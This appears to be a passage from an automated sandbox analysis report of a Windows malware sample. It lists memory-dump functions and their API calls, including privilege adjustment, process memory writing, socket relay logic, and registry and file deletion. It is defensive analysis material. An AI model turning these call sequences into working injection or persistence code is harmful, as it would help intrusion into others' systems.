Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetProcessWindowStation,?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F3A3
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3C5
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3CF
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F40E
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?), ref: 0351F428
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(0355A89F,00000314), ref: 0351F43C

GetStdHandle.KERNEL32(000000F4), ref: 0351D9B9
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0351DA05

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Strings

Runtime Error!Program: , xrefs: 0351D8D5
<program name unknown>, xrefs: 0351D916
..., xrefs: 0351D957
Microsoft Visual C++ Runtime Library, xrefs: 0351D99D

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FE48F2, Relevance: 14.5, APIs: 5, Strings: 2, Instructions: 121

APIs

GetModuleHandleW.KERNEL32 ref: 00FE4932

Part of subcall function 00FD1791: InitializeCriticalSection.KERNEL32(01003510), ref: 00FD17B1
Part of subcall function 00FD1791: InitializeCriticalSection.KERNEL32 ref: 00FD17C6
Part of subcall function 00FD1791: memset.MSVCRT ref: 00FD17DB
Part of subcall function 00FD1791: TlsAlloc.KERNEL32(?,00000000,00FE4986,?,?,00000001), ref: 00FD17F2
Part of subcall function 00FD1791: GetModuleHandleW.KERNEL32(?), ref: 00FD1817

WSAStartup.WS2_32(00000202,?), ref: 00FE4998
CreateEventW.KERNEL32(01002974,00000001), ref: 00FE49BA

Part of subcall function 00FD500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00FD5020
Part of subcall function 00FD500E: GetTokenInformation.ADVAPI32(?,0000000C,01002968,00000004,?), ref: 00FD5048
Part of subcall function 00FD500E: CloseHandle.KERNEL32(?), ref: 00FD505E

GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00FE49EC

Part of subcall function 00FE46CB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FE470E

GetCurrentProcessId.KERNEL32 ref: 00FE4A17

Part of subcall function 00FE472D: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00FE4777
Part of subcall function 00FE472D: lstrcmpiW.KERNEL32(?,?), ref: 00FE47A6

Part of subcall function 00FE47E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE4819
Part of subcall function 00FE47E5: lstrcatW.KERNEL32(?,.dat), ref: 00FE4879
Part of subcall function 00FE47E5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE489E
Part of subcall function 00FE47E5: ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00FE48BB
Part of subcall function 00FE47E5: CloseHandle.KERNEL32 ref: 00FE48C8

Part of subcall function 00FE40F3: IsBadReadPtr.KERNEL32 ref: 00FE412C

Strings

GetProcAddress, xrefs: 00FE4941
LoadLibraryA, xrefs: 00FE494D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FCE5F1, Relevance: 14.5, APIs: 6, Strings: 1, Instructions: 82

APIs

memcpy.MSVCRT ref: 00FCE632
memcpy.MSVCRT ref: 00FCE645
memcpy.MSVCRT ref: 00FCE658
memcpy.MSVCRT ref: 00FCE663
GetFileTime.KERNEL32(?,?,?), ref: 00FCE687
memcpy.MSVCRT ref: 00FCE69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FCE5F8

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2E5F1, Relevance: 14.5, APIs: 6, Strings: 1, Instructions: 82

APIs

memcpy.MSVCRT ref: 00C2E632
memcpy.MSVCRT ref: 00C2E645
memcpy.MSVCRT ref: 00C2E658
memcpy.MSVCRT ref: 00C2E663
GetFileTime.KERNEL32(?,?,?), ref: 00C2E687
memcpy.MSVCRT ref: 00C2E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C2E5F8

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE303C, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 193

APIs

EnterCriticalSection.KERNEL32(01003510,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE305A
LeaveCriticalSection.KERNEL32(01003510,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE3084

Part of subcall function 00FE1215: memset.MSVCRT ref: 00FE122B
Part of subcall function 00FE1215: InitializeCriticalSection.KERNEL32(01002910), ref: 00FE123B
Part of subcall function 00FE1215: memset.MSVCRT ref: 00FE126A
Part of subcall function 00FE1215: InitializeCriticalSection.KERNEL32(010028F0), ref: 00FE1274

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

Part of subcall function 00FF3DAE: memcpy.MSVCRT ref: 00FF3DE4

memcmp.MSVCRT ref: 00FE3175
memcmp.MSVCRT ref: 00FE31A6

Part of subcall function 00FF3D5A: memcpy.MSVCRT ref: 00FF3D94

EnterCriticalSection.KERNEL32(01002910), ref: 00FE3219

Part of subcall function 00FE130C: GetTickCount.KERNEL32 ref: 00FE1313

Part of subcall function 00FE1723: EnterCriticalSection.KERNEL32(010028F0,0100292C,?,?,01002910), ref: 00FE1736
Part of subcall function 00FE1723: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE17E1
Part of subcall function 00FE1723: LeaveCriticalSection.KERNEL32(010028F0,?,?,01002910), ref: 00FE18CB

Part of subcall function 00FE198D: EnterCriticalSection.KERNEL32(01111F88,?,?,?,?,01002910), ref: 00FE1A67
Part of subcall function 00FE198D: LeaveCriticalSection.KERNEL32(01111F88,000000FF,00000000,?,?,?,?,01002910), ref: 00FE1A8F

LeaveCriticalSection.KERNEL32(01002910,0100292C,0100292C,0100292C), ref: 00FE3269

Part of subcall function 00FE5FC2: lstrlenA.KERNEL32(?,?,?,?,?,?,0100292C,?,?,01002910,?,?,?,?,00FE3260,0100292C), ref: 00FE5FD6

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Strings

!, xrefs: 00FE3187
!, xrefs: 00FE31AF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4303C, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 193

APIs

EnterCriticalSection.KERNEL32(00C63510,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4305A
LeaveCriticalSection.KERNEL32(00C63510,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C43084

Part of subcall function 00C41215: memset.MSVCRT ref: 00C4122B
Part of subcall function 00C41215: InitializeCriticalSection.KERNEL32(00C62910), ref: 00C4123B
Part of subcall function 00C41215: memset.MSVCRT ref: 00C4126A
Part of subcall function 00C41215: InitializeCriticalSection.KERNEL32(00C628F0), ref: 00C41274

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Part of subcall function 00C53DAE: memcpy.MSVCRT ref: 00C53DE4

memcmp.MSVCRT ref: 00C43175
memcmp.MSVCRT ref: 00C431A6

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

EnterCriticalSection.KERNEL32(00C62910), ref: 00C43219

Part of subcall function 00C4130C: GetTickCount.KERNEL32 ref: 00C41313

Part of subcall function 00C41723: EnterCriticalSection.KERNEL32(00C628F0,00C6292C,?,?,00C62910), ref: 00C41736
Part of subcall function 00C41723: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C417E1
Part of subcall function 00C41723: LeaveCriticalSection.KERNEL32(00C628F0,?,?,00C62910), ref: 00C418CB

Part of subcall function 00C4198D: EnterCriticalSection.KERNEL32(00000000,?,?,?,?,00C62910), ref: 00C41A67
Part of subcall function 00C4198D: LeaveCriticalSection.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00C62910), ref: 00C41A8F

LeaveCriticalSection.KERNEL32(00C62910,00C6292C,00C6292C,00C6292C), ref: 00C43269

Part of subcall function 00C45FC2: lstrlenA.KERNEL32(?,?,?,?,?,?,00C6292C,?,?,00C62910,?,?,?,?,00C43260,00C6292C), ref: 00C45FD6

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

!, xrefs: 00C43187
!, xrefs: 00C431AF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD9633, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 107

APIs

LoadLibraryW.KERNEL32(?), ref: 00FD9657
GetProcAddress.KERNEL32(?,?), ref: 00FD9685
GetProcAddress.KERNEL32(?,?), ref: 00FD969F
GetProcAddress.KERNEL32(?,?), ref: 00FD96BB
FreeLibrary.KERNEL32 ref: 00FD9769

Part of subcall function 00FD50C0: GetCurrentThread.KERNEL32 ref: 00FD50D4
Part of subcall function 00FD50C0: OpenThreadToken.ADVAPI32 ref: 00FD50DB
Part of subcall function 00FD50C0: GetCurrentProcess.KERNEL32 ref: 00FD50EB
Part of subcall function 00FD50C0: OpenProcessToken.ADVAPI32 ref: 00FD50F2
Part of subcall function 00FD50C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00FD5113
Part of subcall function 00FD50C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00FD5128
Part of subcall function 00FD50C0: GetLastError.KERNEL32 ref: 00FD5132
Part of subcall function 00FD50C0: CloseHandle.KERNEL32(00000001), ref: 00FD5143

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00FD96E8

Part of subcall function 00FD95BE: EqualSid.ADVAPI32(?,5B867A00), ref: 00FD95E1
Part of subcall function 00FD95BE: CloseHandle.KERNEL32(00000001), ref: 00FD9628

Strings

SeTcbPrivilege, xrefs: 00FD96DE

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C39633, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 107

APIs

LoadLibraryW.KERNEL32(?), ref: 00C39657
GetProcAddress.KERNEL32(?,?), ref: 00C39685
GetProcAddress.KERNEL32(?,?), ref: 00C3969F
GetProcAddress.KERNEL32(?,?), ref: 00C396BB
FreeLibrary.KERNEL32 ref: 00C39769

Part of subcall function 00C350C0: GetCurrentThread.KERNEL32 ref: 00C350D4
Part of subcall function 00C350C0: OpenThreadToken.ADVAPI32 ref: 00C350DB
Part of subcall function 00C350C0: GetCurrentProcess.KERNEL32 ref: 00C350EB
Part of subcall function 00C350C0: OpenProcessToken.ADVAPI32 ref: 00C350F2
Part of subcall function 00C350C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00C35113
Part of subcall function 00C350C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00C35128
Part of subcall function 00C350C0: GetLastError.KERNEL32 ref: 00C35132
Part of subcall function 00C350C0: CloseHandle.KERNEL32(00000001), ref: 00C35143

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00C396E8

Part of subcall function 00C395BE: EqualSid.ADVAPI32(?,5B867A00), ref: 00C395E1
Part of subcall function 00C395BE: CloseHandle.KERNEL32(00000001), ref: 00C39628

Strings

SeTcbPrivilege, xrefs: 00C396DE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C447E5, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 93

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C44819

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

lstrcatW.KERNEL32(?,.dat), ref: 00C44879
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C4489E
ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00C448BB
CloseHandle.KERNEL32 ref: 00C448C8

Part of subcall function 00C31905: EnterCriticalSection.KERNEL32(00F41E90,00000000,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31913
Part of subcall function 00C31905: GetFileVersionInfoSizeW.VERSION(00F41EF0,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31933
Part of subcall function 00C31905: GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31953
Part of subcall function 00C31905: LeaveCriticalSection.KERNEL32(00F41E90,?,?,?,?,00C448EB,?,?,00000000), ref: 00C319D2

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C4483A
.dat, xrefs: 00C4486D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6F3F, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 88

APIs

GetFileAttributesW.KERNEL32(?), ref: 00FD6F50
FlushFileBuffers.KERNEL32 ref: 00FD7036

Part of subcall function 00FE44FB: FindFirstFileW.KERNEL32(?,?), ref: 00FE452C
Part of subcall function 00FE44FB: FindNextFileW.KERNEL32(?,?), ref: 00FE457E
Part of subcall function 00FE44FB: FindClose.KERNEL32 ref: 00FE4589
Part of subcall function 00FE44FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FE4595
Part of subcall function 00FE44FB: RemoveDirectoryW.KERNEL32(?), ref: 00FE459C

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

PathRemoveFileSpecW.SHLWAPI(?), ref: 00FD6F85

Part of subcall function 00FCE35B: GetTempPathW.KERNEL32(00000104,?), ref: 00FCE376
Part of subcall function 00FCE35B: PathAddBackslashW.SHLWAPI(?), ref: 00FCE3A0
Part of subcall function 00FCE35B: CreateDirectoryW.KERNEL32(?), ref: 00FCE457
Part of subcall function 00FCE35B: SetFileAttributesW.KERNEL32(?), ref: 00FCE468
Part of subcall function 00FCE35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00FCE481
Part of subcall function 00FCE35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00FCE492

MoveFileExW.KERNEL32(?,?,00000001), ref: 00FD6FCC
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00FD6FE5

Part of subcall function 00FCE56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FCE594

Part of subcall function 00FCE348: CloseHandle.KERNEL32 ref: 00FCE354

Sleep.KERNEL32(00001388), ref: 00FD7028

Strings

.tmp, xrefs: 00FD6F9C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36F3F, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 88

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 00C36F50
FlushFileBuffers.KERNEL32 ref: 00C37036

Part of subcall function 00C444FB: FindFirstFileW.KERNEL32(?,?), ref: 00C4452C
Part of subcall function 00C444FB: FindNextFileW.KERNEL32(?,?), ref: 00C4457E
Part of subcall function 00C444FB: FindClose.KERNEL32 ref: 00C44589
Part of subcall function 00C444FB: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C44595
Part of subcall function 00C444FB: RemoveDirectoryW.KERNEL32(00000000), ref: 00C4459C

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

PathRemoveFileSpecW.SHLWAPI(?), ref: 00C36F85

Part of subcall function 00C2E35B: GetTempPathW.KERNEL32(00000104,?), ref: 00C2E376
Part of subcall function 00C2E35B: PathAddBackslashW.SHLWAPI(?), ref: 00C2E3A0
Part of subcall function 00C2E35B: CreateDirectoryW.KERNEL32(?), ref: 00C2E457
Part of subcall function 00C2E35B: SetFileAttributesW.KERNEL32(?), ref: 00C2E468
Part of subcall function 00C2E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00C2E481
Part of subcall function 00C2E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00C2E492

MoveFileExW.KERNEL32(00000000,?,00000001), ref: 00C36FCC
CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C36FE5

Part of subcall function 00C2E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2E594

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Sleep.KERNEL32(00001388), ref: 00C37028

Strings

.tmp, xrefs: 00C36F9C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE1051, Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(01003510,?,?,00000000,00FE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00FE1067
LeaveCriticalSection.KERNEL32(01003510,?,?,00000000,00FE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00FE108F
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00FE10AB
GetProcAddress.KERNEL32 ref: 00FE10B2
RegDeleteKeyW.ADVAPI32(?,?), ref: 00FE10D4

Strings

RegDeleteKeyExW, xrefs: 00FE10A1
advapi32.dll, xrefs: 00FE10A6

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C41051, Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(00C63510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C41067
LeaveCriticalSection.KERNEL32(00C63510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C4108F
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00C410AB
GetProcAddress.KERNEL32 ref: 00C410B2
RegDeleteKeyW.ADVAPI32(?,?), ref: 00C410D4

Strings

RegDeleteKeyExW, xrefs: 00C410A1
advapi32.dll, xrefs: 00C410A6

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF40CB, Relevance: 14.2, APIs: 8, Instructions: 68

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00FF40DC

Part of subcall function 00FE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4A89
Part of subcall function 00FE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4AC4
Part of subcall function 00FE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B04
Part of subcall function 00FE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B27
Part of subcall function 00FE4A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FE4B77

CreateThread.KERNEL32(00000000,00000000,00FF40AB,?), ref: 00FF4132
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FF413D
CloseHandle.KERNEL32 ref: 00FF4144
WaitForSingleObject.KERNEL32(?,00002710), ref: 00FF4154
CloseHandle.KERNEL32(?), ref: 00FF415B
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FF416C
CloseHandle.KERNEL32 ref: 00FF4173

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C540CB, Relevance: 14.2, APIs: 8, Instructions: 68

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00C540DC

Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44A89
Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44AC4
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B04
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B27
Part of subcall function 00C44A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C44B77

CreateThread.KERNEL32(00000000,00000000,00C540AB,?), ref: 00C54132
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5413D
CloseHandle.KERNEL32 ref: 00C54144
WaitForSingleObject.KERNEL32(?,00002710), ref: 00C54154
CloseHandle.KERNEL32(?), ref: 00C5415B
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C5416C
CloseHandle.KERNEL32 ref: 00C54173

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351FFBF, Relevance: 14.2, APIs: 8, Instructions: 58

APIs

InterlockedIncrement.KERNEL32(?,00000001,?), ref: 0351FFD1
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFDE
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFEB
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFF8
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520005
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520021
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520031
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520047

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FF1474, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 223

APIs

Part of subcall function 00FF2A21: getsockopt.WS2_32(?,0000FFFF,00002004,?,?), ref: 00FF2A47

Part of subcall function 00FD6B66: select.WS2_32(00000000,?,00000000,00000000), ref: 00FD6BC5
Part of subcall function 00FD6B66: recv.WS2_32(?,?,?,00000000), ref: 00FD6BD5

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00FF154F
memcpy.MSVCRT ref: 00FF1587
FreeAddrInfoW.WS2_32(?), ref: 00FF1595
memset.MSVCRT ref: 00FF15B0

Part of subcall function 00FF13F4: getpeername.WS2_32(?,?,?), ref: 00FF1418
Part of subcall function 00FF13F4: getsockname.WS2_32(?,?,?), ref: 00FF1430
Part of subcall function 00FF13F4: send.WS2_32(00000000,?,00000008,00000000), ref: 00FF1461

Part of subcall function 00FD6D02: socket.WS2_32(?,00000001,00000006), ref: 00FD6D0E
Part of subcall function 00FD6D02: bind.WS2_32 ref: 00FD6D2B
Part of subcall function 00FD6D02: listen.WS2_32(?,00000001), ref: 00FD6D38
Part of subcall function 00FD6D02: WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00FF15FC,?,?,?), ref: 00FD6D42
Part of subcall function 00FD6D02: closesocket.WS2_32 ref: 00FD6D4B
Part of subcall function 00FD6D02: WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00FF15FC,?,?,?), ref: 00FD6D52

Part of subcall function 00FD6EB5: accept.WS2_32(?,00000000,?), ref: 00FD6ED6

Part of subcall function 00FD6C17: socket.WS2_32(?,00000001,00000006), ref: 00FD6C23
Part of subcall function 00FD6C17: connect.WS2_32 ref: 00FD6C40
Part of subcall function 00FD6C17: closesocket.WS2_32 ref: 00FD6C4B

Part of subcall function 00FF304D: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00FF3061

Part of subcall function 00FD6D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00FD6D88
Part of subcall function 00FD6D60: recv.WS2_32(?,?,00000400,00000000), ref: 00FD6DB4
Part of subcall function 00FD6D60: send.WS2_32(?,?,?,00000000), ref: 00FD6DD6
Part of subcall function 00FD6D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00FD6E03

Part of subcall function 00FD6EE0: shutdown.WS2_32(?,00000002), ref: 00FD6EEB
Part of subcall function 00FD6EE0: closesocket.WS2_32 ref: 00FD6EF2

Strings

[, xrefs: 00FF15CD
[, xrefs: 00FF1609
[, xrefs: 00FF16E7
Z, xrefs: 00FF1700

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C51474, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 223

APIs

Part of subcall function 00C52A21: getsockopt.WS2_32(?,0000FFFF,00002004,?,?), ref: 00C52A47

Part of subcall function 00C36B66: select.WS2_32(00000000,?,00000000,00000000), ref: 00C36BC5
Part of subcall function 00C36B66: recv.WS2_32(?,?,?,00000000), ref: 00C36BD5

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00C5154F
memcpy.MSVCRT ref: 00C51587
FreeAddrInfoW.WS2_32(?), ref: 00C51595
memset.MSVCRT ref: 00C515B0

Part of subcall function 00C513F4: getpeername.WS2_32(?,?,?), ref: 00C51418
Part of subcall function 00C513F4: getsockname.WS2_32(?,?,?), ref: 00C51430
Part of subcall function 00C513F4: send.WS2_32(00000000,?,00000008,00000000), ref: 00C51461

Part of subcall function 00C36D02: socket.WS2_32(?,00000001,00000006), ref: 00C36D0E
Part of subcall function 00C36D02: bind.WS2_32 ref: 00C36D2B
Part of subcall function 00C36D02: listen.WS2_32(?,00000001), ref: 00C36D38
Part of subcall function 00C36D02: WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D42
Part of subcall function 00C36D02: closesocket.WS2_32 ref: 00C36D4B
Part of subcall function 00C36D02: WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D52

Part of subcall function 00C36EB5: accept.WS2_32(?,00000000,?), ref: 00C36ED6

Part of subcall function 00C36C17: socket.WS2_32(?,00000001,00000006), ref: 00C36C23
Part of subcall function 00C36C17: connect.WS2_32 ref: 00C36C40
Part of subcall function 00C36C17: closesocket.WS2_32 ref: 00C36C4B

Part of subcall function 00C5304D: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00C53061

Part of subcall function 00C36D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36D88
Part of subcall function 00C36D60: recv.WS2_32(?,?,00000400,00000000), ref: 00C36DB4
Part of subcall function 00C36D60: send.WS2_32(?,?,?,00000000), ref: 00C36DD6
Part of subcall function 00C36D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36E03

Part of subcall function 00C36EE0: shutdown.WS2_32(?,00000002), ref: 00C36EEB
Part of subcall function 00C36EE0: closesocket.WS2_32 ref: 00C36EF2

Strings

[, xrefs: 00C515CD
[, xrefs: 00C51609
[, xrefs: 00C516E7
Z, xrefs: 00C51700

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD3D4F, Relevance: 13.8, APIs: 9, Instructions: 261

APIs

GetTickCount.KERNEL32 ref: 00FD3D5E
EnterCriticalSection.KERNEL32 ref: 00FD3D73
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00FD3DB8
GetTickCount.KERNEL32 ref: 00FD3DCB

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FED95F: GetSystemTime.KERNEL32(?), ref: 00FED969

